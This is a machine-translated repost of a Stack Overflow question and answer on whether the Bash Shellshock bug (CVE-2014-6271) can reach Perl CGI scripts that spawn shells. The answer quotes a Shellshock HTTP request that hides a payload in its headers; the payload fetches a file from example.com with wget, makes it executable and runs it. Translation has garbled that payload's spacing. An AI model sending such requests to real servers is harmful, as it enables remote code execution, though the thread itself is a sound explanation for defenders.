簡體   English   中英

bash漏洞CVE-2014-6271。 它會影響我的CGI perl腳本嗎? 如何理解呢?

[英]The bash vulnerability CVE-2014-6271 . Can it affect my CGI perl scripts? How to understand this?

昨天報告了CVE-2014-6271問題,它是BASH Shellshock漏洞。 我試圖了解它是否可以通過我的Perl CGI腳本影響我的服務器。

我的代碼是否可以通過惡意方式受到影響-我的代碼需要做什么才能受到影響? 我應該檢查些什么來驗證這一點?

是的,如果您的CGI腳本生成了子shell,例如使用system()open()函數或反引號,它將影響Perl。 請參閱此出色的Red Hat博客文章 請注意,該博客文章在任何重要方面都不是Red Hat特定的。

檢查您的Perl CGI腳本是否有這些功能, 但要先將BASH升級到固定版本!

您可以嘗試為HTTP服務器ALS Referrer,Cookie,Host或Accept標頭設置特制的字符串,然后將其傳遞到(bash)CGI腳本:

GET./.HTTP/1.0 .User-Agent:.Thanks-Rob .Cookie:()。{。:;。} ;. wget.-O./tmp/besh。 http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh ; .Host:()。{。:;。} ;. wget.-O./tmp/besh。 http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh ; .Referer:()。{。:;。} ;. wget.-O./tmp/besh。 http://example.com/nginx;.chmod.777./tmp/besh;./tmp/besh ; 。接受:。 /

請參閱https://gist.github.com/anonymous/929d622f3b36b00c0be1,作為在野外看到的惡意軟件的真實示例。

如果您的Perl腳本沒有調用bash (通過使用systemopen ),則應該是安全的。

參見https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM